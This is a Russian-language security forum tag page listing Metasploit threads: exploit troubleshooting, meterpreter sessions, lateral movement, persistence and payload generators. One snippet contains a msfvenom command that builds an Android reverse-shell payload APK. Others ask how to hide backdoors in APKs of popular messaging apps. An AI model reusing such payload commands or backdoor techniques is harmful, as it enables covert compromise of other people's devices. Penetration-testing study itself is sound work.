• 🔥 Бесплатный курс от Академии Кодебай: «Анализ защищенности веб-приложений»

    🛡 Научитесь находить и использовать уязвимости веб-приложений.
    🧠 Изучите SQLi, XSS, CSRF, IDOR и другие типовые атаки на практике.
    🧪 Погрузитесь в реальные лаборатории и взломайте свой первый сайт!
    🚀 Подходит новичкам — никаких сложных предварительных знаний не требуется.

    Доступ открыт прямо сейчас Записаться бесплатно

metasploit

  1. F

    Статья RID Hijacking: повышаем привилегии обычного user до Administrator (rid_hijack, metasploit, Kali Linux)

    You must be registered for see element. Иногда довольно сложно удержать доступ к машине жертвы после успешного проникновения, особенно если нет возможности выполнить вредоносный код от имени администратора или создать и добавить пользователя в привилегированную группу. Сегодня хотел бы...
  2. non_logs

    Metasploit продвижение по локальной сети

    Добрый день! У меня возник вопрос как после попадания на один ПК в сети проникнуть и в другие ПК это сети ? Вопрос меня сильно волнует но не знаю как это воспроизвести. Делаю реферат на тему "Уязвимости ПК" с демонстрацией)
  3. R

    Проблема Eternalblue & Doublepulsar. Error getting output back from Core.

    В локалке имеется машинка Win7 SP1 x86 (192.168.1.106) И Kali linux (192.168.1.103) на которую установлен Metasploit-Framework с добавленным модулем exploit/windows/smb/eternalblue_doublepulsar. Сканирую виндовую машину с помощью auxiliary/scaner/smb/smb_ms17_010: Делаю вывод, что машинка...
  4. C

    Проблема Метасплоитэйбл - подключение к нему.

    При попытке подключиться к нему (через другую ОС) - выдаёт ошибку, будто он выключен (The connection has timed out). Не могу понять, что не так настроил в настроках "Сеть", в Вирт.Боксе. Может кто знает какие настройки нужны?
  5. D

    Уязвимости SCADA систем

    Здравствуйте. Есть ли в интернете примеры реализаций атак на scada системы, ПЛК, асу тп? Если это можно реализовать в метасплоите, то как? И какие системы защиты на данный момент есть для АСУ ТП. Спасибо.
  6. U

    помогите разобраться с эксплоитом ms17-010

    Сразу скажу опыта в этом нет никакого и вот я экспериментирую над своим компом. В общем посмотрел видосики как с мобилы ломануть комп и понеслась .... установил Termux потом Metasploit..... В общем прогресс дошел до того, что в метаэксплоите использую данную уязвимость и подключаюсь к командной...
  7. D

    Проблема Не подключается пэйлоад

    Здравствуйте, вообщем проблема такая, создал я значит через Termux пэйлоад по такой схеме msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.102 LPORT=4444 R > Payload.apk Попросил подругу помочь с тестом, установила она его на телефон и запустила, я попытался подключиться msfconsole...
  8. Sunnych

    Каталог Этичный Хакинг (тестирование на проникновение): каталог статей

    Начало You must be registered for see element. Статьи You must be registered for see element. You must be registered for see element. You must be registered for see element. You must be registered for see element. You must be registered for see element. Framework You must be registered for...
  9. A

    Шелл в сесиии meterpreter

    Добрый день. Получил сессию meterpreter, и у меня сразу же открылся командный шелл (cmd). После этого не удается перейти на стандартный шелл meterpreter. Как быть? You must be registered for see element. Есть еще вопрос: после того как получил сессию, и случайно закрыл терминал, то всё...
  10. A

    Что делать после получения шелла?

    Добрый день, уважаемые форумчане! Возникла такая проблема. После получения обратного шелла за локалкой не знаю что делать дальше. Тут у меня возникло сразу несколько вопросов: 1. Как после получения шелла закрепить себя (шелл обратный за локалкой, в оперативе)? 2. Нужно ли юзаать мимикатц? 3...
  11. invetrika

    Help me!!! помогите с apk добавить backdoor

    Всем доброго времени суток, возникла у меня некая потребность сделать apk с backdoor (в обяз vk или аналоги, insta или аналоги, wa или аналоги) и столкнулся с проблемой создания, какие тоошибки при сборке и т.д., ну далее по порядку распишу последовательность своих действий. Что имеется под...
  12. G

    Ошибка wine

    Доброго дня. Wine выдает ошибку - 0029:err: plugplay:handle_bus_relations Failed to load driver L"WineHID" и нигде не смог найти ответа как же исправить эту беду. Помогите плиз.
  13. House26

    Решено Миграция процесса meterpreter в другой процесс Android

    Добрый день форумчане)Подскажите как можно мигрировать процесс meterpretor в другой процесс на Android?Или как можно закрепиться в системе?
  14. House26

    Проблема Meterpreter/reverse_tcp через VDS/VPS

    Всем шалом)Возник интересный вопрос.Если на удаленном сервере vds/vps установить Metasploit.Создать файл с полезной нагрузкой,что бы он стучался на ip сервера.Сессия в таком случае будет прилетать или все таки устройства должны находиться в одной локальной сити?
  15. House26

    Проблема Backdoor Apk (Не прилетает сессия)

    Приветствую всех)Возникла проблема при создание приложение для Android с backdoor.Раньше эксперементировал с данным инструментов,все было ok.Теперь возникает такая ошибка.В чем может быть проблема? You must be registered for see element.You must be registered for see element.You must be...
  16. Tayrus

    Как в metasploit указать много целей?

    Как указать в metasploit много целей? Список например.
  17. Vander

    Статья Deep Exploit - Metasploit на Arch Linux ARM. Работа с реальным сервером

    Приветствую всех, жителей и гостей форума, в одной из моих предыдущих статей, а именно You must be registered for see element.. You must be registered for see element. В You must be registered for see element. я показал, как установить и довольно успешно пользоваться замечательным инструментом...
  18. ruda_dima

    Статья Получаем ключ к PRO версии Metasploit

    Это вторая моя статья, и в этой статье хотел бы поделиться способом добычи ключей для trial версии Metasploit PRO. Наверное всем известно, что команда разработчиков Rapid7 изменила свою политику выдачу ключей для ПРО версии своего продукта. На данный момент ключ мгновенно на почту могут...
  19. U

    Выбор нагрузки / payloads? В чем отличия?

    Привет моему любимому комьюнити! При создании rat-ника и другой нечисти, в конце следует выбрать метод "нагрузки". в Метасплоите имеются следующие: windows/x64/shell/bind_tcp Listen for a connection (Windows x64), Spawn a piped command shell (Windows x64) (staged)...
  20. Vertigo

    Статья Terminator - генератор Payloads для Metasploit

    You must be registered for see element. Добрый день,Уважаемые Форумчане,Друзья и те,кто следит за пульсом ИБ. Хочу порадовать форум сегодня новинкой,которая генерирует различные backdoor. Автора этого замечательного генератора зовут Mohamed Nour. Помогать мне сегодня будут сделать обзор...